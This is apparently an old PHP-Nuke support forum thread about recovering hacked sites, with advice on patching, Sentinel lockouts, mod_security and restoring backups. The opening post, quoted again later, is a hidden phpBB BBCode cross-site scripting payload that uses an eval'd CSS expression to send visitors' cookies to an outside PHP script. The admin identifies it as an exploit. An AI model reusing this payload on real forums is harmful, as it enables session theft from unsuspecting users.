(read first) If your site hacked

Nuke Cadet Joined: Jul 23, 2005 Posts: 1

Intresting...
[url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://speed-skating.net/.so/foo.php?c='+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'

Nuke Soldier Joined: Jul 22, 2005 Posts: 10

Evaders99 wrote:

You'll have to install the latest BBToNuke and Patched files, so there's really nothing you can do. Install them, and then redo your custom modifications.

A good program like Winmerge will help comparing files and getting those changes done.

theres really no way of patching without losing everything I've done? There's gotta be Sad

Site Admin Joined: Aug 17, 2003 Posts: 12368

There's no automatic approach to this unfortunately. There are too many changes to the files, in probably 99% of the time - it would be easier to redo your modifications than try to do all the patched changes manually.

Changed logs for the Patched files are available at http://www.nukefixes.com , however they may not be complete depending on the file version you are using

Sergeant Joined: Aug 28, 2004 Posts: 119

For some reason my pass didnt work anymore, although there were no signs of being hacked, so i cleared the admin accounts from the authors table, and went to admin.php however i have it setup to popup to come up (sentinel) and it wont recognise there is no account, therefor i cannot get into admin :S what can i do?

Sergeant Joined: Aug 28, 2004 Posts: 119

anyone? please?

Site Admin Joined: Aug 17, 2003 Posts: 12368

You may need to disable Sentinel

Sergeant Joined: Aug 28, 2004 Posts: 119

Ok what i did was point the htaccess to a non existant file that way the sentinel login popup wouldnt come up, i made a new admin, activated sentinel and everything is just fine

Lieutenant Joined: Sep 13, 2003 Posts: 291

ExtremeGamer wrote:

Not only was my siter hacked. I cannot change the language as you will see here.

http://www.impa-gscrb.org/html

EG Very Happy

I thought a hacker changed the language on my site too, but it was caused by the gallery Coppermine. When I changed Coppermine to my original language the language of PHP-Nuke changed too and the site worked perfectly normal again.

Nuke Cadet Joined: Nov 01, 2005 Posts: 1

Hello,

the reason why I'm here is quite strange. recently, in my stats I got somes visitors through this page and I don't know why until today when I make displayed the source code of the page and find the adress of my site.

why, when I quote jook, I can see the adress of my website??

here is what we saw when wuoting is message saying interesting. My website is speed-skating.net

Code:

[quote="jook"]Intresting...
[color=#EFEFEF][url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://speed-skating.net/.so/foo.php?c='+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'[/color][/quote]

thanks

Site Admin Joined: Aug 17, 2003 Posts: 12368

It is a hacker trying to exploit a vulnerability in phpBB. If you are using 2.0.17 of the forums, you should not be vulnerable to this.

Nuke Cadet Joined: Nov 17, 2005 Posts: 3

Hi All,

Instead of relying on 3rd party add-ons to protect you in phpNuke why don't you take it on from a different angle? phpNuke and phpBB (which is the real attack vector of most attacks) are the real problem here because they're 3rd party and you don't really know what's going on. If you add yet another 3rd party "plug in" to phpNuke, you're still relying on someone else and a known-to-be-buggy infrastructure for your protection. It's so disappointing to see comments like "I no longer use phpNuke 7.5. I now use the more secure 7.6 platinum..." Which is only secure until the next exploit, and so on and so on... Here's a thought, if they got to 7.5 with holes in it, what makes you think 7.6 is the exact first version with no problems at all? Especially considering you can get 7.9 already...

Instead, if you have the ability, install mod_security for Apache. This allows you to pre-filter URLs before Apache even handles them, so you can drop anything that's not playing by the rules. http://www.modsecurity.org/download/index.html.

I've just put a long rant about this in the r0nin thread http://www.nukecops.com/postx44102-0-15.html so I won't repeat it (but if you have the time, check it out, it's one of the most powerful security mods available for Apache) but I will make one point again.

If you've been hacked, there is NO QUICK FIX. You can't "undo" what they did. ESPECIALLY if you have to ask people how. How do you know what else they did? Did they install and execute a shell? If they did, what did they do with it? Only one option: Format+Reinstall. There is no other way to get your machine back.

Site Admin Joined: Aug 17, 2003 Posts: 12368

There are levels of hacking. Mostly, its script kiddies that will deface your site with their junk. In that case, they won't have the skills to do any real damage to your server.

You are right that server compromised by executing scripts should be reinstalled.

Private Joined: Nov 17, 2005 Posts: 46

My website(nuke) got hacked. I have the backup from admin panel but i don't know how to use it.Nuke version was 7.6. The hackers deleted blocks, and I can not turn them back
How could they hack it, where is the bug or hole ?
What shall I do ?,and my i my nuke has renane to another place,how can i turn it to the before place?

Site Admin Joined: Aug 17, 2003 Posts: 12368

If you have a database backup, you can use phpMyAdmin to restore those tables. Delete your old ones and insert the ones from the backup

Next, load a backup of your files.. no telling what they could have installed on your site. Then upgrade your software - use the latest Patched files for your version, get all your modules upgraded, install a good security addon.

Nuke Cadet Joined: Feb 20, 2006 Posts: 4

JadeFist wrote:

I followed the instructions in the first post of this thread. Why won't it create a new admin account? I can't see the security code graphic. Is there something I'm missing in the steps of that post?

Anyone with an answer to this, anyone. I mean it nice having the time off becuase I can't access the CP, but I will have to sometime.